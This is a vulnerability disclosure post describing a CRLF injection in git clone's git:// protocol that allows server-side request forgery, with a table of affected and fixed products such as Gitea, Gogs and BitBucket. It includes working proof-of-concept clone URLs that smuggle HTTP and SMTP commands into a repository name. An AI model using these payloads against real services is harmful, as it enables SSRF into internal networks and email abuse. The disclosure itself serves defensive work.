Article List

git clone CRLF bug leading to SSRF in various products


Sun Nov 08 2020 18:10:00 GMT+0900 (일본 표준시)
bughuntinggitkallitheagogsgiteaexploit0daybitbucket

Description

When we connect to a server with git:// protocol, server, we send an initial request packet that looks something like:

shell
002dgit-upload-pack repo.git\0host=example.com

When the repository contains a newline on it, the git clone command also includes the newline (CR, LF) to the packet.

002egit-upload-pack repo
.git\0host=example.com

It looks fine at first sight, but the main problem with this is that it is possible to send packets to other ports to communicate with other protocols, which can lead to possibility of SSRF attack on internal services.

For example, running commands like the following

shell
$ git clone 'git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a'

will eventually send the following packet to localhost:1234.

0050git-upload-pack /
GET / HTTP/1.1
Host:localhost

host=localhost:1234

We can somewhat create some sophisticated pro With this way, it is possible to send some SMTP packets like the following code and send e-mails over SMTP protocol.

shell
$ git clone 'git://localhost:25/x%0d%0aHELO%20localhost%0d%0aMAIL%20FROM%3A%[email protected]%3E%0d%0aRCPT%20TO%3A%[email protected]%3E%0d%0aDATA%0d%0aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%0d%0aTo%3A%20%[email protected]%0d%0aDate%3ATue,%2015%20Sep%202017%0aSubject%3A%20Hi%0d%0a.%0d%0aQUIT%0a'

Patch Status

  • git/git has been fixed appropriately.

  • Softwares that rely on git clone may be affected by this vulnerability.

Affected Products

Product NameCurrent StatusReference
gitFixed@a02ea577
KallitheaFixedRelease Notes v0.63
GogsFixedPlans to fix in upcoming release (v0.13)
GiteaFixedRelease v1.12.6
BitBucketMitigatedBounty awarded: P3

Unaffected Products

Product NameReason
GitHubGit protocol is not supported
GiteePort part is filtered, which leads to no impact
GitLabCRLF characters were filtered